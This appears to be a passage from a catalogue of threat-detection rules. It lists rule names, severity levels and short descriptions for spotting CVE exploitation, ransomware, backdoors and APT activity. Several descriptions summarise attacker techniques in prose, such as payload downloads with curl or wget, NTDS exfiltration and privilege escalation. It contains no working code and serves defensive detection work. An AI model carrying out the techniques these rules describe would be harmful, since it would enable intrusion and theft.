  • Potential CVE-2021-42278 Exploitation Attempt - Level: medium
    Description: The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
  • Suspicious Computer Account Name Change CVE-2021-42287 - Level: high
    Description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
  • Grafana Path Traversal Exploitation CVE-2021-43798 - Level: critical
    Description: Detects a successful Grafana path traversal exploitation
  • CVE-2021-44077 POC Default Dropped File - Level: high
    Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon - Level: high
    Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
  • Log4j RCE CVE-2021-44228 Generic - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
  • Log4j RCE CVE-2021-44228 in Fields - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
  • Exchange ProxyShell Pattern - Level: high
    Description: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)
  • Suspicious RazerInstaller Explorer Subprocess - Level: high
    Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
  • Successful Exchange ProxyShell Attack - Level: critical
    Description: Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
  • Potential SystemNightmare Exploitation Attempt - Level: critical
    Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
  • SonicWall SSL/VPN Jarrewrite Exploitation - Level: high
    Description: Detects exploitation attempts of the SonicWall Jarrewrite Exploit
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
  • Conti Volume Shadow Listing - Level: high
    Description: Detects a command used by conti to find volume shadow backups
  • Conti NTDS Exfiltration Command - Level: high
    Description: Detects a command used by conti to exfiltrate NTDS
  • Potential Conti Ransomware Activity - Level: critical
    Description: Detects a specific command used by the Conti ransomware group
  • Potential Conti Ransomware Database Dumping Activity Via SQLCmd - Level: high
    Description: Detects a command used by conti to dump database
  • DarkSide Ransomware Pattern - Level: critical
    Description: Detects DarkSide Ransomware and helpers
  • Potential Devil Bait Related Indicator - Level: high
    Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC
  • Potential Devil Bait Malware Reconnaissance - Level: high
    Description: Detects specific process behavior observed with Devil Bait samples
  • Devil Bait Potential C2 Communication Traffic - Level: high
    Description: Detects potential C2 communication related to Devil Bait malware
  • FoggyWeb Backdoor DLL Loading - Level: critical
    Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
  • Goofy Guineapig Backdoor IOC - Level: high
    Description: Detects malicious indicators seen used by the Goofy Guineapig malware
  • Potential Goofy Guineapig Backdoor Activity - Level: high
    Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
  • Potential Goofy Guineapig GoolgeUpdate Process Anomaly - Level: high
    Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
  • Goofy Guineapig Backdoor Potential C2 Communication - Level: high
    Description: Detects potential C2 communication related to Goofy Guineapig backdoor
  • Goofy Guineapig Backdoor Service Creation - Level: critical
    Description: Detects service creation persistence used by the Goofy Guineapig backdoor
  • Moriya Rootkit File Created - Level: critical
    Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
  • Pingback Backdoor File Indicators - Level: high
    Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
  • Pingback Backdoor DLL Loading Activity - Level: high
    Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
  • Pingback Backdoor Activity - Level: high
    Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
  • Small Sieve Malware File Indicator Creation - Level: high
    Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
  • Small Sieve Malware CommandLine Indicator - Level: high
    Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
  • Small Sieve Malware Potential C2 Communication - Level: critical
    Description: Detects potential C2 communication related to Small Sieve malware
  • Small Sieve Malware Registry Persistence - Level: high
    Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware
  • HAFNIUM Exchange Exploitation Activity - Level: critical
    Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  • Exchange Exploitation Used by HAFNIUM - Level: high
    Description: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
  • REvil Kaseya Incident Malware Patterns - Level: critical
    Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
  • APT PRIVATELOG Image Load Pattern - Level: high
    Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
  • SOURGUM Actor Behaviours - Level: high
    Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
  • DEWMODE Webshell Access - Level: high
    Description: Detects access to DEWMODE webshell as described in FIREEYE report
  • Potential CVE-2023-21554 QueueJumper Exploitation - Level: high
    Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
  • Potential CVE-2022-21587 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution - Level: medium
    Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
  • CVE-2022-24527 Microsoft Connected Cache LPE - Level: high
    Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
  • Potential CVE-2022-26809 Exploitation Attempt - Level: high
    Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE - Level: medium
    Description: Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection
  • Potential CVE-2022-29072 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.
  • CVE-2022-31659 VMware Workspace ONE Access RCE - Level: medium
    Description: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass - Level: high
    Description: Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656 VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
  • Apache Spark Shell Command Injection - Weblogs - Level: high
    Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
  • Atlassian Bitbucket Command Injection Via Archive API - Level: high
    Description: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
  • Potential OWASSRF Exploitation Attempt - Webserver - Level: high
    Description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint
  • OWASSRF Exploitation Attempt Using Public POC - Webserver - Level: critical
    Description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
  • Suspicious Sysmon as Execution Parent - Level: high
    Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
  • Exploitation Indicator Of CVE-2022-42475 - Level: high
    Description: Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 - Level: high
    Description: Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877
  • Potential CVE-2022-46169 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169
  • MSSQL Extended Stored Procedure Backdoor Maggie - Level: high
    Description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
  • BlueSky Ransomware Artefacts - Level: high
    Description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.
  • Potential Bumblebee Remote Thread Creation - Level: high
    Description: Detects remote thread injection events based on action seen used by bumblebee
  • ChromeLoader Malware Execution - Level: high
    Description: Detects execution of ChromeLoader malware via a registered scheduled task
  • Emotet Loader Execution Via .LNK File - Level: high
    Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.
  • Hermetic Wiper TG Process Patterns - Level: high
    Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
  • Raspberry Robin Subsequent Execution of Commands - Level: high
    Description: Detects raspberry robin subsequent execution of commands.
  • Raspberry Robin Initial Execution From External Drive - Level: high
    Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
  • Serpent Backdoor Payload Execution Via Scheduled Task - Level: high
    Description: Detects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
  • Potential Raspberry Robin Dot Ending File - Level: high
    Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
  • Potential ACTINIUM Persistence Activity - Level: high
    Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
  • FakeUpdates/SocGholish Activity - Level: high
    Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
  • MERCURY APT Activity - Level: high
    Description: Detects suspicious command line patterns seen being used by MERCURY APT
  • MSMQ Corrupted Packet Encountered - Level: high
    Description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.
  • Exploitation Indicators Of CVE-2023-20198 - Level: high
    Description: Detecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) - Level: high
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • Potential CVE-2023-2283 Exploitation - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation.
  • Outlook Task/Note Reminder Received - Level: low
    Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
  • CVE-2023-23397 Exploitation Attempt - Level: critical
    Description: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
  • Potential CVE-2023-23397 Exploitation Attempt - SMB - Level: medium
    Description: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
  • Potential CVE-2023-23752 Exploitation Attempt - Level: high
    Description: Detects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla
  • Potential CVE-2023-25157 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25157 a SQL injection in GeoServer
  • Potential CVE-2023-25717 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25717 a Remote Code Execution via an unauthenticated HTTP GET Request, in Ruckus Wireless Admin
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader - Level: high
    Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
  • Potential CVE-2023-27997 Exploitation Indicators - Level: medium
    Description: Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity - Level: high
    Description: Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE - Level: medium
    Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting Opportunity Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request - Level: high
    Description: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
  • Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location - Level: medium
    Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation - Level: high
    Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution - Level: high
    Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
  • Potential CVE-2023-36884 Exploitation Dropped File - Level: medium
    Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation Pattern - Level: critical
    Description: Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2303-36884 URL Request Pattern Traffic - Level: high
    Description: Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCOM potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - File Downloads - Level: medium
    Description: Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - URL Marker - Level: high
    Description: Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - Share Access - Level: high
    Description: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File - Level: high
    Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
  • CVE-2023-40477 Potential Exploitation - .REV File Creation - Level: low
    Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Level: high
    Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash - Level: medium
    Description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy - Level: high
    Description: Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web - Level: high
    Description: Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.
  • Potential CVE-2023-46214 Exploitation Attempt - Level: medium
    Description: Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code - Level: high
    Description: Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
  • CVE-2023-46747 Exploitation Activity - Proxy - Level: high
    Description: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-46747 Exploitation Activity - Webserver - Level: high
    Description: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: high
    Description: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: high
    Description: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE - Level: high
    Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
  • Potential SocGholish Second Stage C2 DNS Query - Level: high
    Description: Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic
  • Potential COLDSTEEL RAT File Indicators - Level: high
    Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
  • Potential COLDSTEEL Persistence Service DLL Creation - Level: high
    Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
  • Potential COLDSTEEL Persistence Service DLL Load - Level: high
    Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
  • COLDSTEEL RAT Anonymous User Process Execution - Level: high
    Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
  • COLDSTEEL RAT Cleanup Command Execution - Level: critical
    Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
  • COLDSTEEL RAT Service Persistence Execution - Level: critical
    Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
  • Potential COLDSTEEL RAT Windows User Creation - Level: high
    Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
  • COLDSTEEL Persistence Service Creation - Level: high
    Description: Detects the creation of new services potentially related to COLDSTEEL RAT
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process - Level: medium
    Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
  • DarkGate - Autoit3.EXE Execution Parameters - Level: high
    Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.
  • DarkGate - User Created Via Net.EXE - Level: high
    Description: Detects creation of local users via the net.exe command with the name of "DarkGate"
  • Griffon Malware Attack Pattern - Level: critical
    Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity - Level: high
    Description: Detects the execution of installed GuLoader malware on the host. GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 - Level: high
    Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
  • Potential Pikabot C2 Activity - Level: high
    Description: Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE - Level: medium
    Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
  • Potential Pikabot Discovery Activity - Level: high
    Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
  • Potential Pikabot Hollowing Activity - Level: high
    Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
  • Pikabot Fake DLL Extension Execution Via Rundll32.EXE - Level: high
    Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
  • Qakbot Regsvr32 Calc Pattern - Level: high
    Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
  • Potential Qakbot Rundll32 Execution - Level: high
    Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
  • Qakbot Rundll32 Exports Execution - Level: critical
    Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
  • Qakbot Rundll32 Fake DLL Extension Execution - Level: critical
    Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
  • Qakbot Uninstaller Execution - Level: high
    Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
  • Rhadamanthys Stealer Module Launch Via Rundll32.EXE - Level: medium
    Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
  • Rorschach Ransomware Execution Activity - Level: critical
    Description: Detects Rorschach ransomware execution activity
  • SNAKE Malware Kernel Driver File Indicator - Level: critical
    Description: Detects SNAKE malware kernel driver file indicator
  • SNAKE Malware WerFault Persistence File Creation - Level: high
    Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
  • SNAKE Malware Installer Name Indicators - Level: low
    Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report
  • Potential SNAKE Malware Installation CLI Arguments Indicator - Level: high
    Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
  • Potential SNAKE Malware Installation Binary Indicator - Level: high
    Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
  • Potential SNAKE Malware Persistence Service Execution - Level: high
    Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
  • SNAKE Malware Covert Store Registry Key - Level: high
    Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA
  • Potential Encrypted Registry Blob Related To SNAKE Malware - Level: medium
    Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
  • SNAKE Malware Service Persistence - Level: critical
    Description: Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report
  • Ursnif Redirection Of Discovery Commands - Level: high
    Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
  • Potential Compromised 3CXDesktopApp Beaconing Activity - DNS - Level: high
    Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
  • Malicious DLL Load By Compromised 3CXDesktopApp - Level: critical
    Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon - Level: high
    Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
  • Potential Compromised 3CXDesktopApp Execution - Level: high
    Description: Detects execution of known compromised version of 3CXDesktopApp
  • Potential Suspicious Child Process Of 3CXDesktopApp - Level: high
    Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
  • Potential Compromised 3CXDesktopApp Update Activity - Level: high
    Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy - Level: high
    Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
  • Potential Compromised 3CXDesktopApp ICO C2 File Download - Level: high
    Description: Detects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the the malicious Github repository
  • Diamond Sleet APT DNS Communication Indicators - Level: high
    Description: Detects DNS queries related to Diamond Sleet APT activity
  • Diamond Sleet APT File Creation Indicators - Level: high
    Description: Detects file creation activity that is related to Diamond Sleet APT activity
  • Diamond Sleet APT DLL Sideloading Indicators - Level: high
    Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
  • Diamond Sleet APT Process Activity Indicators - Level: high
    Description: Detects process creation activity indicators related to Diamond Sleet APT
  • Diamond Sleet APT Scheduled Task Creation - Registry - Level: high
    Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
  • Diamond Sleet APT Scheduled Task Creation - Level: critical
    Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
  • Potential Operation Triangulation C2 Beaconing Activity - DNS - Level: high
    Description: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
  • Potential Operation Triangulation C2 Beaconing Activity - Proxy - Level: high
    Description: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
  • Potential APT FIN7 Related PowerShell Script Created - Level: high
    Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
  • Potential APT FIN7 POWERHOLD Execution - Level: high
    Description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
  • Potential POWERTRASH Script Execution - Level: high
    Description: Detects potential execution of the PowerShell script POWERTRASH
  • Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity - Level: high
    Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
  • Lace Tempest File Indicators - Level: high
    Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
  • Lace Tempest PowerShell Evidence Eraser - Level: high
    Description: Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
  • Lace Tempest PowerShell Launcher - Level: high
    Description: Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
  • Lace Tempest Cobalt Strike Download - Level: high
